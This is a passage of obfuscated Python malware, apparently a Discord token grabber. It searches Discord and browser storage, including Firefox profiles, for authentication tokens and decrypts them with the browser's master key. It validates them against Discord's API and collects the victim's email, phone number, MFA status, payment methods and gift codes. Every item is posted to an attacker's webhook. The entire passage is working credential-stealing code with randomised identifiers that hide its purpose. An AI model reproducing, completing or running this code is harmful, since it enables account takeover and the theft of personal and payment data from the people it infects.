                                        JPNJEVIFSTTMRXNARGAPBWTNWYTFNFFWYGLBWSDDRHJRTAZBZXCWBQRBDNDVMUWOVNUYBGLEGCDRFWZOUGUTHCRWSJDQBWUBUUQP.append(PGCFQNMABRFVFVXYVZSFZXIPEDNTDYBVUOQNIJTHKDSOKWACVOGWLERTIDHOJELUZAFLCKQHSHZADSYWMA)
                                        VOHAWAMSGXDQWRGZKYITPIXBSRUQTTRLCBDGUCTWVOJGHLORTQYHLEVKROZDATPFGZX.append(YRHUMSJLRFVTMBCBLZKZJXSFRHIQKXKYCBHCAYRMSEIGZRFNJQMZARNPDEZSUMPKQDTSCLOXHIWYNEMVAOADXILEVQQACD)
                                        IYYUAPKRALZEUNOKHKWVXIKICGLDTRVXTQHXWAUPVDNKDVNLDVSWEAOBLDWHVUGMQNGQMTUMCX[PGCFQNMABRFVFVXYVZSFZXIPEDNTDYBVUOQNIJTHKDSOKWACVOGWLERTIDHOJELUZAFLCKQHSHZADSYWMA] = (ZTWHZCVGRFKBDPZGHFCNZQDAXUXKCDABAZONXIXPTSXXYHDIFBPCREQXLBBYLUIQDBKGTIHRETDCIDJKWHTFGJAKYYC, f"{QYDLRJXMCKWZTAYRDUWVLAITWVTPSALNJDGDCFFUVLNHUQDRRPJQWBERQMCSEDQILOCGVKNIXWDTOREHERDJ}\\{v4r_file_name}")
            else:
                for v4r_file_name in os.listdir(QYDLRJXMCKWZTAYRDUWVLAITWVTPSALNJDGDCFFUVLNHUQDRRPJQWBERQMCSEDQILOCGVKNIXWDTOREHERDJ):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    with open(f'{QYDLRJXMCKWZTAYRDUWVLAITWVTPSALNJDGDCFFUVLNHUQDRRPJQWBERQMCSEDQILOCGVKNIXWDTOREHERDJ}\\{v4r_file_name}', errors='ignore') as v4r_file:
                        for v4r_line in v4r_file:
                            for PGCFQNMABRFVFVXYVZSFZXIPEDNTDYBVUOQNIJTHKDSOKWACVOGWLERTIDHOJELUZAFLCKQHSHZADSYWMA in re.findall(ADTLPCYNAYBZFVDYHIOPKIGPDWPQTLYNNBMSVVTOEHLPYZNRNE, v4r_line.strip()):
                                if validate_t0k3n(PGCFQNMABRFVFVXYVZSFZXIPEDNTDYBVUOQNIJTHKDSOKWACVOGWLERTIDHOJELUZAFLCKQHSHZADSYWMA, JFUUHNJRLDRGTUKPUNWMCWWKDYVOECHYVJNPNURVPUVWJMZTBLMZKPCFGHFKRENHGLJJAOCTCIHSJETBCJABOTMPECAMF):
                                    YRHUMSJLRFVTMBCBLZKZJXSFRHIQKXKYCBHCAYRMSEIGZRFNJQMZARNPDEZSUMPKQDTSCLOXHIWYNEMVAOADXILEVQQACD = requests.get(JFUUHNJRLDRGTUKPUNWMCWWKDYVOECHYVJNPNURVPUVWJMZTBLMZKPCFGHFKRENHGLJJAOCTCIHSJETBCJABOTMPECAMF, headers={'Authorization': PGCFQNMABRFVFVXYVZSFZXIPEDNTDYBVUOQNIJTHKDSOKWACVOGWLERTIDHOJELUZAFLCKQHSHZADSYWMA}).json()['id']
                                    if YRHUMSJLRFVTMBCBLZKZJXSFRHIQKXKYCBHCAYRMSEIGZRFNJQMZARNPDEZSUMPKQDTSCLOXHIWYNEMVAOADXILEVQQACD not in VOHAWAMSGXDQWRGZKYITPIXBSRUQTTRLCBDGUCTWVOJGHLORTQYHLEVKROZDATPFGZX:
                                        JPNJEVIFSTTMRXNARGAPBWTNWYTFNFFWYGLBWSDDRHJRTAZBZXCWBQRBDNDVMUWOVNUYBGLEGCDRFWZOUGUTHCRWSJDQBWUBUUQP.append(PGCFQNMABRFVFVXYVZSFZXIPEDNTDYBVUOQNIJTHKDSOKWACVOGWLERTIDHOJELUZAFLCKQHSHZADSYWMA)
                                        VOHAWAMSGXDQWRGZKYITPIXBSRUQTTRLCBDGUCTWVOJGHLORTQYHLEVKROZDATPFGZX.append(YRHUMSJLRFVTMBCBLZKZJXSFRHIQKXKYCBHCAYRMSEIGZRFNJQMZARNPDEZSUMPKQDTSCLOXHIWYNEMVAOADXILEVQQACD)
                                        IYYUAPKRALZEUNOKHKWVXIKICGLDTRVXTQHXWAUPVDNKDVNLDVSWEAOBLDWHVUGMQNGQMTUMCX[PGCFQNMABRFVFVXYVZSFZXIPEDNTDYBVUOQNIJTHKDSOKWACVOGWLERTIDHOJELUZAFLCKQHSHZADSYWMA] = (ZTWHZCVGRFKBDPZGHFCNZQDAXUXKCDABAZONXIXPTSXXYHDIFBPCREQXLBBYLUIQDBKGTIHRETDCIDJKWHTFGJAKYYC, f"{QYDLRJXMCKWZTAYRDUWVLAITWVTPSALNJDGDCFFUVLNHUQDRRPJQWBERQMCSEDQILOCGVKNIXWDTOREHERDJ}\\{v4r_file_name}")

        if os.path.exists(DFWLKRNYWFPNAEXLAVTKVFGPERLTHTOEDHWRTVCHTDCCDUCSJJOOWRFXVONONMNRMCVHYZSMDNTSKOSWXYVBREJDOSEVIJL + "\\Mozilla\\Firefox\\Profiles"):
            for QYDLRJXMCKWZTAYRDUWVLAITWVTPSALNJDGDCFFUVLNHUQDRRPJQWBERQMCSEDQILOCGVKNIXWDTOREHERDJ, _, v4r_files in os.walk(DFWLKRNYWFPNAEXLAVTKVFGPERLTHTOEDHWRTVCHTDCCDUCSJJOOWRFXVONONMNRMCVHYZSMDNTSKOSWXYVBREJDOSEVIJL + "\\Mozilla\\Firefox\\Profiles"):
                for v4r__file in v4r_files:
                    if v4r__file.endswith('.sqlite'):
                        with open(f'{QYDLRJXMCKWZTAYRDUWVLAITWVTPSALNJDGDCFFUVLNHUQDRRPJQWBERQMCSEDQILOCGVKNIXWDTOREHERDJ}\\{v4r__file}', errors='ignore') as v4r_file:
                            for v4r_line in v4r_file:
                                for PGCFQNMABRFVFVXYVZSFZXIPEDNTDYBVUOQNIJTHKDSOKWACVOGWLERTIDHOJELUZAFLCKQHSHZADSYWMA in re.findall(ADTLPCYNAYBZFVDYHIOPKIGPDWPQTLYNNBMSVVTOEHLPYZNRNE, v4r_line.strip()):
                                    if validate_t0k3n(PGCFQNMABRFVFVXYVZSFZXIPEDNTDYBVUOQNIJTHKDSOKWACVOGWLERTIDHOJELUZAFLCKQHSHZADSYWMA, JFUUHNJRLDRGTUKPUNWMCWWKDYVOECHYVJNPNURVPUVWJMZTBLMZKPCFGHFKRENHGLJJAOCTCIHSJETBCJABOTMPECAMF):
                                        YRHUMSJLRFVTMBCBLZKZJXSFRHIQKXKYCBHCAYRMSEIGZRFNJQMZARNPDEZSUMPKQDTSCLOXHIWYNEMVAOADXILEVQQACD = requests.get(JFUUHNJRLDRGTUKPUNWMCWWKDYVOECHYVJNPNURVPUVWJMZTBLMZKPCFGHFKRENHGLJJAOCTCIHSJETBCJABOTMPECAMF, headers={'Authorization': PGCFQNMABRFVFVXYVZSFZXIPEDNTDYBVUOQNIJTHKDSOKWACVOGWLERTIDHOJELUZAFLCKQHSHZADSYWMA}).json()['id']
                                        if YRHUMSJLRFVTMBCBLZKZJXSFRHIQKXKYCBHCAYRMSEIGZRFNJQMZARNPDEZSUMPKQDTSCLOXHIWYNEMVAOADXILEVQQACD not in VOHAWAMSGXDQWRGZKYITPIXBSRUQTTRLCBDGUCTWVOJGHLORTQYHLEVKROZDATPFGZX:
                                            JPNJEVIFSTTMRXNARGAPBWTNWYTFNFFWYGLBWSDDRHJRTAZBZXCWBQRBDNDVMUWOVNUYBGLEGCDRFWZOUGUTHCRWSJDQBWUBUUQP.append(PGCFQNMABRFVFVXYVZSFZXIPEDNTDYBVUOQNIJTHKDSOKWACVOGWLERTIDHOJELUZAFLCKQHSHZADSYWMA)
                                            VOHAWAMSGXDQWRGZKYITPIXBSRUQTTRLCBDGUCTWVOJGHLORTQYHLEVKROZDATPFGZX.append(YRHUMSJLRFVTMBCBLZKZJXSFRHIQKXKYCBHCAYRMSEIGZRFNJQMZARNPDEZSUMPKQDTSCLOXHIWYNEMVAOADXILEVQQACD)
                                            IYYUAPKRALZEUNOKHKWVXIKICGLDTRVXTQHXWAUPVDNKDVNLDVSWEAOBLDWHVUGMQNGQMTUMCX[PGCFQNMABRFVFVXYVZSFZXIPEDNTDYBVUOQNIJTHKDSOKWACVOGWLERTIDHOJELUZAFLCKQHSHZADSYWMA] = ('Firefox', f"{QYDLRJXMCKWZTAYRDUWVLAITWVTPSALNJDGDCFFUVLNHUQDRRPJQWBERQMCSEDQILOCGVKNIXWDTOREHERDJ}\\{v4r__file}")
        return JPNJEVIFSTTMRXNARGAPBWTNWYTFNFFWYGLBWSDDRHJRTAZBZXCWBQRBDNDVMUWOVNUYBGLEGCDRFWZOUGUTHCRWSJDQBWUBUUQP, IYYUAPKRALZEUNOKHKWVXIKICGLDTRVXTQHXWAUPVDNKDVNLDVSWEAOBLDWHVUGMQNGQMTUMCX

    def validate_t0k3n(PGCFQNMABRFVFVXYVZSFZXIPEDNTDYBVUOQNIJTHKDSOKWACVOGWLERTIDHOJELUZAFLCKQHSHZADSYWMA, JFUUHNJRLDRGTUKPUNWMCWWKDYVOECHYVJNPNURVPUVWJMZTBLMZKPCFGHFKRENHGLJJAOCTCIHSJETBCJABOTMPECAMF):
        return requests.get(JFUUHNJRLDRGTUKPUNWMCWWKDYVOECHYVJNPNURVPUVWJMZTBLMZKPCFGHFKRENHGLJJAOCTCIHSJETBCJABOTMPECAMF, headers={'Authorization': PGCFQNMABRFVFVXYVZSFZXIPEDNTDYBVUOQNIJTHKDSOKWACVOGWLERTIDHOJELUZAFLCKQHSHZADSYWMA}).status_code == 200

    def decrypt_val(UUXHHOCOMVEJENXYFWIMQJEZRJAKOQNNQBAGTTPGSHMXZUTYWNWIHKCXMMQAGH, v4r_master_key):
        v4r_iv = UUXHHOCOMVEJENXYFWIMQJEZRJAKOQNNQBAGTTPGSHMXZUTYWNWIHKCXMMQAGH[3:15]
        v4r_payload = UUXHHOCOMVEJENXYFWIMQJEZRJAKOQNNQBAGTTPGSHMXZUTYWNWIHKCXMMQAGH[15:]
        v4r_cipher = AES.new(v4r_master_key, AES.MODE_GCM, v4r_iv)
        return v4r_cipher.decrypt(v4r_payload)[:-16].decode()

    def get_master_key(QYDLRJXMCKWZTAYRDUWVLAITWVTPSALNJDGDCFFUVLNHUQDRRPJQWBERQMCSEDQILOCGVKNIXWDTOREHERDJ):
        if not os.path.exists(QYDLRJXMCKWZTAYRDUWVLAITWVTPSALNJDGDCFFUVLNHUQDRRPJQWBERQMCSEDQILOCGVKNIXWDTOREHERDJ):
            return None
        with open(QYDLRJXMCKWZTAYRDUWVLAITWVTPSALNJDGDCFFUVLNHUQDRRPJQWBERQMCSEDQILOCGVKNIXWDTOREHERDJ, "r", encoding="utf-8") as v4r_f:
            v4r_local_state = json.load(v4r_f)
        v4r_master_key = base64.b64decode(v4r_local_state["os_crypt"]["encrypted_key"])[5:]
        return CryptUnprotectData(v4r_master_key, None, None, None, 0)[1]

    def upload_t0k3n5():
        JPNJEVIFSTTMRXNARGAPBWTNWYTFNFFWYGLBWSDDRHJRTAZBZXCWBQRBDNDVMUWOVNUYBGLEGCDRFWZOUGUTHCRWSJDQBWUBUUQP, IYYUAPKRALZEUNOKHKWVXIKICGLDTRVXTQHXWAUPVDNKDVNLDVSWEAOBLDWHVUGMQNGQMTUMCX = extr4ct_t0k3n5()
        VTFRPQVEZBDNXMZIGAHKOIZJFXMMTNEQGBIDUGGRMGLPWFFEBWJPEVAQSSEPBG = SyncWebhook.from_url(UIGKKQMJAYHAAQSCTOJCDKCKFCPFINTHBJLZEVZXQTIRNZGGWNSPHTNFTUVYNUI)

        if not JPNJEVIFSTTMRXNARGAPBWTNWYTFNFFWYGLBWSDDRHJRTAZBZXCWBQRBDNDVMUWOVNUYBGLEGCDRFWZOUGUTHCRWSJDQBWUBUUQP:
            PPSDURRQEFQJOLDUVNXMFMXVJNFQPVSQBHHXJXUHDUVVIQWAICETRKFFF = Embed(
                title=f'Discord Token `{BHQWYHPFKNMZCKQDMSPFHACZRNPOXAXCWHUEUAPBQMFBRVJUQJXVKATNGRQVMCUJFZOLDYLIWPTDO} "{FFPQBJKKPSLHVOCLMLQUBRSWWHWHKWYQYRJDUFLYIESVNZBYANOVTCDBXQS}"`:', 
                description=f"No discord tokens found.",
                color=KBZJTQSDRYZVEHFZDDQNYFYDMDCRLTBLEHHYOBWEZEADTEVKMAZLOAGXEBVJHGOADPANRDED)
            PPSDURRQEFQJOLDUVNXMFMXVJNFQPVSQBHHXJXUHDUVVIQWAICETRKFFF.set_footer(text=ZWBDJHUEEYOZSFFWTNRUZSOKQJIWEQJPTVKFJVGBULBYJEQXUSBWVCGHRQSBFGGKZKMIFLOYAVMCBFWTPFFDVS, icon_url=FGLSTRYGWZLQKQRAFBRRSTLCRKPWABXAZKKTLAZFKLLVPCMXLVRKGWSQAYOIKIZDDCYORUXULLBOYUEJZQGRPVRRWXZWPQI)
            VTFRPQVEZBDNXMZIGAHKOIZJFXMMTNEQGBIDUGGRMGLPWFFEBWJPEVAQSSEPBG.send(embed=PPSDURRQEFQJOLDUVNXMFMXVJNFQPVSQBHHXJXUHDUVVIQWAICETRKFFF, username=XKXJBWQQEPDFFGSTROLMMXLPGVEBOWYXZLEVUXERWPMQLGJJIFJZZMJXOTJISBGIPYRQEARNXWQGPHKFPUZALAMXPMN, avatar_url=FGLSTRYGWZLQKQRAFBRRSTLCRKPWABXAZKKTLAZFKLLVPCMXLVRKGWSQAYOIKIZDDCYORUXULLBOYUEJZQGRPVRRWXZWPQI)
            return
        
        for PGCFQNMABRFVFVXYVZSFZXIPEDNTDYBVUOQNIJTHKDSOKWACVOGWLERTIDHOJELUZAFLCKQHSHZADSYWMA_d15c0rd in JPNJEVIFSTTMRXNARGAPBWTNWYTFNFFWYGLBWSDDRHJRTAZBZXCWBQRBDNDVMUWOVNUYBGLEGCDRFWZOUGUTHCRWSJDQBWUBUUQP:
            FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU = requests.get('https://discord.com/api/v8/users/@me', headers={'Authorization': PGCFQNMABRFVFVXYVZSFZXIPEDNTDYBVUOQNIJTHKDSOKWACVOGWLERTIDHOJELUZAFLCKQHSHZADSYWMA_d15c0rd}).json()

            QGUTJAXKCOTXFBADUEZBUESRYLTKIFESORVCISJMKHXWXHUKBWQBEVZVGVSOBAKOYORIPEFOXNHRBSAPCDZSVOGJEKSWZTDEM = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('username', "None") + '#' + FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('discriminator', "None")
            YTNUKPPOBOINREZTMDGTZIJTKRUUUCCPZVATIORKJHNLQZTYPRCZE = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('global_name', "None")
            CQRTCWDOERUFOTDUCWMTMJBPGPJAACMSOLPXDRFSDDHWYGZOPUWAXFJDGUORQXSEIBLPHUDHDTDBLUDWLIYWLZSNBUR = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('id', "None")
            PCUXGYBTHRKXIGGXICHGKCYFHNZIJSNTJWMYAHSLGLAYKZVMEKDDJV = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('email', "None")
            EWRGWCEUCBNCTACMRREVEJECUJNWTMHMFXDUYBSDVXPIKTDSYYDPWGOPLDQPYJT = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('verified', "None")
            JZEVYNFFIEVCUAPWWYWSHJWCIPMCDOQPRREQNHPQVLEMQTBKGHDWHVOGYHSBLTDFHTYXOZRMKBNRJKVQRWSNR = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('phone', "None")
            HTKBXLGCAAXYAXNNKJZTUJNKVEEIVGOCBNOKPEMLHIQQHDJEKFZQMXZNCDHEPOXRLPGCIXFJNQYIMSBFWMLLVPPEIKLSEBWUUDD = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('locale', "None")
            IUNSLJPKAMHFOKIIUGAAEXKSXZFLTKUHBYHPGHXDBFZCCHEPFSNHKYYHWSGXMLQCGBWGOXQUDASZBCLMUTUKEASOSCSLMGREMV = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('mfa_enabled', "None")

            try:
                if FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('premium_type', 'None') == 0:
                    MBBHPCTANUBYIEHHVVRQHWFRTFODKYHOXTXNMVYAGWEBJHREEGMBBEVGBWMJRDXTVVKSBLEDLXFGZF = 'False'
                elif FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('premium_type', 'None') == 1:
                    MBBHPCTANUBYIEHHVVRQHWFRTFODKYHOXTXNMVYAGWEBJHREEGMBBEVGBWMJRDXTVVKSBLEDLXFGZF = 'Nitro Classic'
                elif FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('premium_type', 'None') == 2:
                    MBBHPCTANUBYIEHHVVRQHWFRTFODKYHOXTXNMVYAGWEBJHREEGMBBEVGBWMJRDXTVVKSBLEDLXFGZF = 'Nitro Boosts'
                elif FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('premium_type', 'None') == 3:
                    MBBHPCTANUBYIEHHVVRQHWFRTFODKYHOXTXNMVYAGWEBJHREEGMBBEVGBWMJRDXTVVKSBLEDLXFGZF = 'Nitro Basic'
                else:
                    MBBHPCTANUBYIEHHVVRQHWFRTFODKYHOXTXNMVYAGWEBJHREEGMBBEVGBWMJRDXTVVKSBLEDLXFGZF = 'False'
            except:
                MBBHPCTANUBYIEHHVVRQHWFRTFODKYHOXTXNMVYAGWEBJHREEGMBBEVGBWMJRDXTVVKSBLEDLXFGZF = "None"

            try: 
                THJKECFFAGBMDXYFOIQABGLHJRJEJRMCRPZEGNPGMNJXRNOLQEGVHKFLEJLAQURWGGQFZXHKFYXEISPYIGZKJES = f"https://cdn.discordapp.com/avatars/{CQRTCWDOERUFOTDUCWMTMJBPGPJAACMSOLPXDRFSDDHWYGZOPUWAXFJDGUORQXSEIBLPHUDHDTDBLUDWLIYWLZSNBUR}/{FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU['avatar']}.gif" if requests.get(f"https://cdn.discordapp.com/avatars/{CQRTCWDOERUFOTDUCWMTMJBPGPJAACMSOLPXDRFSDDHWYGZOPUWAXFJDGUORQXSEIBLPHUDHDTDBLUDWLIYWLZSNBUR}/{FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU['avatar']}.gif").status_code == 200 else f"https://cdn.discordapp.com/avatars/{CQRTCWDOERUFOTDUCWMTMJBPGPJAACMSOLPXDRFSDDHWYGZOPUWAXFJDGUORQXSEIBLPHUDHDTDBLUDWLIYWLZSNBUR}/{FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU['avatar']}.png"
            except: 
                THJKECFFAGBMDXYFOIQABGLHJRJEJRMCRPZEGNPGMNJXRNOLQEGVHKFLEJLAQURWGGQFZXHKFYXEISPYIGZKJES = FGLSTRYGWZLQKQRAFBRRSTLCRKPWABXAZKKTLAZFKLLVPCMXLVRKGWSQAYOIKIZDDCYORUXULLBOYUEJZQGRPVRRWXZWPQI

            try:
                ZLXKJQJHBHYWNFMGLVLNNUXMKQAJTXRFPTUDDWGGUYCZJPZPCLMAYWARFERXPWWU = requests.get('https://discord.com/api/v6/users/@me/billing/payment-sources', headers={'Authorization': PGCFQNMABRFVFVXYVZSFZXIPEDNTDYBVUOQNIJTHKDSOKWACVOGWLERTIDHOJELUZAFLCKQHSHZADSYWMA_d15c0rd}).json()
                if ZLXKJQJHBHYWNFMGLVLNNUXMKQAJTXRFPTUDDWGGUYCZJPZPCLMAYWARFERXPWWU:
                    WNPMBYWHAFAXTBKSOFZWLDARMCIYDDQCHKZPZFYXGZUBLREKMFBIZOPPFDGVFSEBNNVCKFTLTQMFRBM = []

                    for v4r_method in ZLXKJQJHBHYWNFMGLVLNNUXMKQAJTXRFPTUDDWGGUYCZJPZPCLMAYWARFERXPWWU:
                        if v4r_method['type'] == 1:
                            WNPMBYWHAFAXTBKSOFZWLDARMCIYDDQCHKZPZFYXGZUBLREKMFBIZOPPFDGVFSEBNNVCKFTLTQMFRBM.append('CB')
                        elif v4r_method['type'] == 2:
                            WNPMBYWHAFAXTBKSOFZWLDARMCIYDDQCHKZPZFYXGZUBLREKMFBIZOPPFDGVFSEBNNVCKFTLTQMFRBM.append("Paypal")
                        else:
                            WNPMBYWHAFAXTBKSOFZWLDARMCIYDDQCHKZPZFYXGZUBLREKMFBIZOPPFDGVFSEBNNVCKFTLTQMFRBM.append('Other')
                    WNPMBYWHAFAXTBKSOFZWLDARMCIYDDQCHKZPZFYXGZUBLREKMFBIZOPPFDGVFSEBNNVCKFTLTQMFRBM = ' / '.join(WNPMBYWHAFAXTBKSOFZWLDARMCIYDDQCHKZPZFYXGZUBLREKMFBIZOPPFDGVFSEBNNVCKFTLTQMFRBM)
                else:
                    WNPMBYWHAFAXTBKSOFZWLDARMCIYDDQCHKZPZFYXGZUBLREKMFBIZOPPFDGVFSEBNNVCKFTLTQMFRBM = "None"
            except:
                WNPMBYWHAFAXTBKSOFZWLDARMCIYDDQCHKZPZFYXGZUBLREKMFBIZOPPFDGVFSEBNNVCKFTLTQMFRBM = "None"

            try:
                PNLPURFFFTZKDSKSOULKTEOPWCTLKSYRBODRCXHMPBHYLIFPVVUEEZQ = requests.get('https://discord.com/api/v9/users/@me/outbound-promotions/codes', headers={'Authorization': PGCFQNMABRFVFVXYVZSFZXIPEDNTDYBVUOQNIJTHKDSOKWACVOGWLERTIDHOJELUZAFLCKQHSHZADSYWMA_d15c0rd}).json()
                if PNLPURFFFTZKDSKSOULKTEOPWCTLKSYRBODRCXHMPBHYLIFPVVUEEZQ:
                    DKOOHZCSFTWBSMHARIOQLGFRQQMYLVOFEUFIDRUIZJRNSYVJTEJPVBZDMMZQVOCLFSHAFUSFDXHUEZCCLHZOEBTJWDHB = []
                    for DHYMFVWBSAWNJFXYOYQHVDAQFCQTBEBYHQXQTXDJWFBBFLZAFRLWEWOQKDJAUZFUNO in PNLPURFFFTZKDSKSOULKTEOPWCTLKSYRBODRCXHMPBHYLIFPVVUEEZQ:
                        ZTWHZCVGRFKBDPZGHFCNZQDAXUXKCDABAZONXIXPTSXXYHDIFBPCREQXLBBYLUIQDBKGTIHRETDCIDJKWHTFGJAKYYC = DHYMFVWBSAWNJFXYOYQHVDAQFCQTBEBYHQXQTXDJWFBBFLZAFRLWEWOQKDJAUZFUNO['promotion']['outbound_title']
                        DHYMFVWBSAWNJFXYOYQHVDAQFCQTBEBYHQXQTXDJWFBBFLZAFRLWEWOQKDJAUZFUNO = DHYMFVWBSAWNJFXYOYQHVDAQFCQTBEBYHQXQTXDJWFBBFLZAFRLWEWOQKDJAUZFUNO['code']
                        POITZNURIJJEYQFGRDZSODXYDNMHLHGHDQOHDICENZJHEGNGMMSSWVHMQYFEHUQCDJXDYJ = f"Gift: {ZTWHZCVGRFKBDPZGHFCNZQDAXUXKCDABAZONXIXPTSXXYHDIFBPCREQXLBBYLUIQDBKGTIHRETDCIDJKWHTFGJAKYYC}\nCode: {DHYMFVWBSAWNJFXYOYQHVDAQFCQTBEBYHQXQTXDJWFBBFLZAFRLWEWOQKDJAUZFUNO}"
                        if len('\n\n'.join(DHYMFVWBSAWNJFXYOYQHVDAQFCQTBEBYHQXQTXDJWFBBFLZAFRLWEWOQKDJAUZFUNO)) + len(POITZNURIJJEYQFGRDZSODXYDNMHLHGHDQOHDICENZJHEGNGMMSSWVHMQYFEHUQCDJXDYJ) >= 1024:
                            break
                        DKOOHZCSFTWBSMHARIOQLGFRQQMYLVOFEUFIDRUIZJRNSYVJTEJPVBZDMMZQVOCLFSHAFUSFDXHUEZCCLHZOEBTJWDHB.append(POITZNURIJJEYQFGRDZSODXYDNMHLHGHDQOHDICENZJHEGNGMMSSWVHMQYFEHUQCDJXDYJ)
                    if len(DKOOHZCSFTWBSMHARIOQLGFRQQMYLVOFEUFIDRUIZJRNSYVJTEJPVBZDMMZQVOCLFSHAFUSFDXHUEZCCLHZOEBTJWDHB) > 0:
                        DHYMFVWBSAWNJFXYOYQHVDAQFCQTBEBYHQXQTXDJWFBBFLZAFRLWEWOQKDJAUZFUNO = '\n\n'.join(DKOOHZCSFTWBSMHARIOQLGFRQQMYLVOFEUFIDRUIZJRNSYVJTEJPVBZDMMZQVOCLFSHAFUSFDXHUEZCCLHZOEBTJWDHB)
                    else:
                        DHYMFVWBSAWNJFXYOYQHVDAQFCQTBEBYHQXQTXDJWFBBFLZAFRLWEWOQKDJAUZFUNO = "None"
                else:
                    DHYMFVWBSAWNJFXYOYQHVDAQFCQTBEBYHQXQTXDJWFBBFLZAFRLWEWOQKDJAUZFUNO = "None"
            except:
                DHYMFVWBSAWNJFXYOYQHVDAQFCQTBEBYHQXQTXDJWFBBFLZAFRLWEWOQKDJAUZFUNO = "None"
        
            v4r_software_name, QYDLRJXMCKWZTAYRDUWVLAITWVTPSALNJDGDCFFUVLNHUQDRRPJQWBERQMCSEDQILOCGVKNIXWDTOREHERDJ = IYYUAPKRALZEUNOKHKWVXIKICGLDTRVXTQHXWAUPVDNKDVNLDVSWEAOBLDWHVUGMQNGQMTUMCX.get(PGCFQNMABRFVFVXYVZSFZXIPEDNTDYBVUOQNIJTHKDSOKWACVOGWLERTIDHOJELUZAFLCKQHSHZADSYWMA_d15c0rd, ("Unknown Software", "Unknown location"))

            embed = Embed(title=f'Discord Token `{BHQWYHPFKNMZCKQDMSPFHACZRNPOXAXCWHUEUAPBQMFBRVJUQJXVKATNGRQVMCUJFZOLDYLIWPTDO} "{FFPQBJKKPSLHVOCLMLQUBRSWWHWHKWYQYRJDUFLYIESVNZBYANOVTCDBXQS}"`:', color=KBZJTQSDRYZVEHFZDDQNYFYDMDCRLTBLEHHYOBWEZEADTEVKMAZLOAGXEBVJHGOADPANRDED)      
            embed.add_field(name=":file_folder: Path:", value=f"```{QYDLRJXMCKWZTAYRDUWVLAITWVTPSALNJDGDCFFUVLNHUQDRRPJQWBERQMCSEDQILOCGVKNIXWDTOREHERDJ}```", inline=True)
            embed.add_field(name=":globe_with_meridians: Token:", value=f"```{PGCFQNMABRFVFVXYVZSFZXIPEDNTDYBVUOQNIJTHKDSOKWACVOGWLERTIDHOJELUZAFLCKQHSHZADSYWMA_d15c0rd}```", inline=True)
            embed.add_field(name=":package: Software:", value=f"```{v4r_software_name}```", inline=True)
            embed.add_field(name=":bust_in_silhouette: Username:", value=f"```{QGUTJAXKCOTXFBADUEZBUESRYLTKIFESORVCISJMKHXWXHUKBWQBEVZVGVSOBAKOYORIPEFOXNHRBSAPCDZSVOGJEKSWZTDEM}```", inline=True)
            embed.add_field(name=":bust_in_silhouette: Display Name:", value=f"```{YTNUKPPOBOINREZTMDGTZIJTKRUUUCCPZVATIORKJHNLQZTYPRCZE}```", inline=True)
            embed.add_field(name=":robot: Id:", value=f"```{CQRTCWDOERUFOTDUCWMTMJBPGPJAACMSOLPXDRFSDDHWYGZOPUWAXFJDGUORQXSEIBLPHUDHDTDBLUDWLIYWLZSNBUR}```", inline=True)
            embed.add_field(name=":e_mail: Email:", value=f"```{PCUXGYBTHRKXIGGXICHGKCYFHNZIJSNTJWMYAHSLGLAYKZVMEKDDJV}```", inline=True)
            embed.add_field(name=":white_check_mark: Email Verified:", value=f"```{EWRGWCEUCBNCTACMRREVEJECUJNWTMHMFXDUYBSDVXPIKTDSYYDPWGOPLDQPYJT}```", inline=True)
            embed.add_field(name=":telephone_receiver: Phone:", value=f"```{JZEVYNFFIEVCUAPWWYWSHJWCIPMCDOQPRREQNHPQVLEMQTBKGHDWHVOGYHSBLTDFHTYXOZRMKBNRJKVQRWSNR}```", inline=True)   
            embed.add_field(name=":rocket: Nitro:", value=f"```{MBBHPCTANUBYIEHHVVRQHWFRTFODKYHOXTXNMVYAGWEBJHREEGMBBEVGBWMJRDXTVVKSBLEDLXFGZF}```", inline=True)
